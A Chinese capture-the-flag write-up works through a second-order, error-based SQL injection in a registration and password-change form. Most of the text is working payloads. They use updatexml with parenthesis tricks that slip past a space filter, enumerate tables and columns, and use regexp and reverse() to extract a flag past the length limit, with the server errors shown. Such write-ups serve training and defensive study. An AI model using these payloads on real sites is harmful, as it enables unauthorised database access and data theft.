题目
打开是有注册和登录的字样。先随便注册,再登录。
发现三个中二的文段。同时url栏有?title=xxx
点击用户名,发现可以更改密码。那应该是有一个update语句。
这种可能存在注入的是用户名和密码,所以回到注册去试一下。
注册用户名 1 ' " 回到改密码的地方,发现报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' "1'"" and pwd='c4ca4238a0b923820dcc509a6f75849b'' at line 1猜测语句是select * from users where uname="" and pwd=""; 双引号闭合。报错注入。过滤空格,括号绕过。 username=1"|| (updatexml(1 ,concat('~' ,(select (database()))),1 ))#& password= 123 & email= 123 XPATH syntax error: '~web_sqli' username= 1 "||(updatexml(1,concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#&password=123&email=123 XPATH syntax error: '~article,flag,users' username=1"|| (updatexml(1 ,concat('~' ,(select (group_concat(column_name))from (information_schema.columns)where (table_name= 'flag' ))),1 ))#& password= 123 & email= 123 XPATH syntax error: '~flag' username= 1 "||(updatexml(1,concat('~',(select(flag)from(flag))),1))#&password=123&email=123 XPATH syntax error: '~RCTF{Good job! But flag not her' 继续查其他表。 username=1"|| (updatexml(1 ,(select (group_concat(column_name))from (information_schema.columns)where (table_name= 'users' )),1 ))#& password= 123 & email= 123 XPATH syntax error: ',pwd,email,real_flag_1s_here' username= 1 "||(updatexml(1,(select(real_flag_1s_here)from(users)),1))#&password=123&email=123 Subquery returns more than 1 row 由于有多个列,所以回显不出来。用正则匹配 username=1"|| (updatexml(1 ,(select (real_flag_1s_here)from (users)where (real_flag_1s_here)regexp('^f' )),1 ))#& password= 123 & email= 123 XPATH syntax error: '{b89b2233-e011-429a-902c-08568c7' updatexml()函数有长度限制(32 位),使用reverse()进行倒序输出 username= 1 "||(updatexml(1,concat('~',reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#&password=123&email=123 XPATH syntax error: '~}c3f6f7c86580-c209-a924-110e-33' python >>> s="}c3f6f7c86580- c209- a924-110e-33 " >>> s=s[::-1] >>> print(s) 33-e011-429a-902c-08568c7f6f3c} flag{b89b2233-e011-429a-902c-08568c7f6f3c}
参考:
https://blog.csdn.net/RABCDXB/article/details/122491459
https://blog.csdn.net/mochu7777777/article/details/105179021
https://blog.csdn.net/weixin_48335916/article/details/112339923
wechat
alipay